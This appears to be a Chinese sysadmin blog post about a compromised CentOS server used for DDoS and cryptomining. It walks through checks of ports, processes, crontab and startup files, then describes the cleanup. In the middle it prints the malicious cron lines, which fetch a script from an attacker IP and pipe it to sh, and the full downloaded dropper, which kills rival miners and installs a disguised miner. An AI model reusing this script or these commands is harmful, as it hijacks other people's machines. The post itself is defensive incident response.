说明:按上一篇文章处理后,隔了几天,又开始报故障了,郁闷中。。。静下心来一个个问题分析
平台环境
系统平台:CentOS 6.9系统
运行服务:tomcat、nginx、memcached
运行平台:公司题库系统(单点)
故障现象
被阿里云通知—-对外DDOS肉机攻击行为
说明此服务器被攻破,并被攻击者当成肉机,对外实施DDOS攻击了。
故障排查
1、先看端口是否有没有异常
-bash-4.1# ss -tunl
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:11211 *:*
udp UNCONN 0 0 123.56.176.16:123 *:*
udp UNCONN 0 0 10.46.166.44:123 *:*
udp UNCONN 0 0 127.0.0.1:123 *:*
udp UNCONN 0 0 *:123 *:*
tcp LISTEN 0 1 127.0.0.1:32000 *:*
tcp LISTEN 0 128 *:10050 *:*
tcp LISTEN 0 1 127.0.0.1:8005 *:*
tcp LISTEN 0 1 127.0.0.1:8006 *:*
tcp LISTEN 0 100 *:8009 *:*
tcp LISTEN 0 100 *:8010 *:*
tcp LISTEN 0 128 *:11211 *:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 *:8081 *:*
tcp LISTEN 0 128 *:8082 *:*
tcp LISTEN 0 128 *:22 *:*
一切正常!
2、查看资源有没有异常
-bash-4.1# top
top – 16:43:32 up 2:55, 1 user, load average: 0.00, 0.00, 0.00
Tasks: 187 total, 1 running, 186 sleeping, 0 stopped, 0 zombie
Cpu(s): 5.3%us, 1.1%sy, 0.0%ni, 93.2%id, 0.0%wa, 0.0%hi, 0.3%si, 0.0%st
Mem: 8193204k total, 3790816k used, 4402388k free, 114424k buffers
Swap: 0k total, 0k used, 0k free, 503040k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1762 root 20 0 5767m 930m 11m S 10.6 11.6 1:52.41 /usr/bin/java -Djava.util.logging.config.file=/opt/zhlserv
1829 root 20 0 5764m 1.0g 11m S 9.3 13.2 2:59.57 /usr/bin/java -Djava.util.logging.config.file=/opt/zhlserv
1412 root 20 0 2378m 72m 10m S 3.7 0.9 1:37.30 /usr/local/cloudmonitor/jre/bin/java -Djava.compiler=none
1920 root 20 0 44288 27m 972 S 3.0 0.3 0:00.81 nginx: worker process
1410 root 20 0 113m 1520 920 S 0.3 0.0 0:05.13 /usr/local/cloudmonitor/wrapper/bin/./wrapper /usr/local/c
1536 root 20 0 114m 11m 8416 S 0.3 0.1 0:28.10 /usr/local/aegis/aegis_client/aegis_10_19/AliYunDun
1896 root 20 0 44292 27m 976 S 0.3 0.3 0:00.76 nginx: worker process
1900 root 20 0 44264 27m 972 S 0.3 0.3 0:01.01 nginx: worker process
1904 root 20 0 44304 27m 976 S 0.3 0.3 0:01.10 nginx: worker process
1910 root 20 0 44300 27m 956 S 0.3 0.3 0:01.12 nginx: worker process
1919 root 20 0 44292 27m 976 S 0.3 0.3 0:00.87 nginx: worker process
上面是示例说明(这是处理好的)
A、当时按c看到CPU资源占用300%有一个进程 ,找到进程ID查到文件路径,发现此文件是陌生文件先结束进行,以方便顺便操作,太卡了。
B、先此文件改名,在用top命令查看资源占用,结果一切正常
3、看计划任务是否正常
由于上面查出来有陌生文件在运行,随即查看计划任务Crontab -l,哎呀,我的神呀,有两个计划任务。
* 23 * * * wget http://91.230.47.40/logo.jpg
* 23 * * * http://91.230.47.40/logo.jpg | sh
这不是我们要的东西,肯定有问题,将网址复制到自己电脑上,把这个文件下载下来,然后将后缀名改成.sh,打文本打开一看,果然是脚本。
#!/bin/sh
rm -rf /var/tmp/cebjtlbny.conf
rm -rf /var/tmp/qsbfhbjcp.conf
rm -rf /var/tmp/dcdvzfanm.conf
rm -rf /var/tmp/agetty
ps auxf|grep -v grep|grep -v vbwdlkfjm|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cebjtlbny"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qsbfhbjcp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "dcdvzfanm"|awk '{print $2}'|xargs kill -9
ps -fe|grep vbwdlkfjm|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/vbwdlkfjm.conf
rm -rf /var/tmp/vbwdlkfjm.conf
curl -o /var/tmp/vbwdlkfjm.conf http://91.230.47.40/common/kworker.conf
wget -O /var/tmp/vbwdlkfjm.conf http://91.230.47.40/common/kworker.conf
chmod 777 /var/tmp/irqbalance
rm -rf /var/tmp/irqbalance
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/irqbalance http://91.230.47.40/common/kworker
wget -O /var/tmp/irqbalance http://91.230.47.40/common/kworker
else
curl -o /var/tmp/irqbalance http://91.230.47.40/common/kworker_na
wget -O /var/tmp/irqbalance http://91.230.47.40/common/kworker_na
fi
chmod +x /var/tmp/irqbalance
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./irqbalance -c vbwdlkfjm.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi
清除任务计划。
4、重新启动时,在Centos启动加载时,看加载是否有不熟悉项。
由于第3步中的问题,还是怀疑问题不止这一处,于时将服务器重新启动查看启动时加载的服务和程序,果然在启动加载时发现rc.local中有其它东西,除此之外rc3.d中也有其它东西,还有/tmp目录下。
找到相关文件知彻底清除,将/tmp目录清空,重新系统。
验证是否处理
运行top查看,那个资源占用一切正常,没有原来那个可疑的进程了,
查看/tmp目录,和启动过程,一切正常了。
再次检测并更新系统程序包
yum install upgrade
重要说明 :只是分享解决问题的思路,具体细节,因为已经处理后写的文档,所以不太详细,请谅解。
- 本文固定链接: https://www.gayj.cn/?p=358
- 转载请注明: https://www.gayj.cn/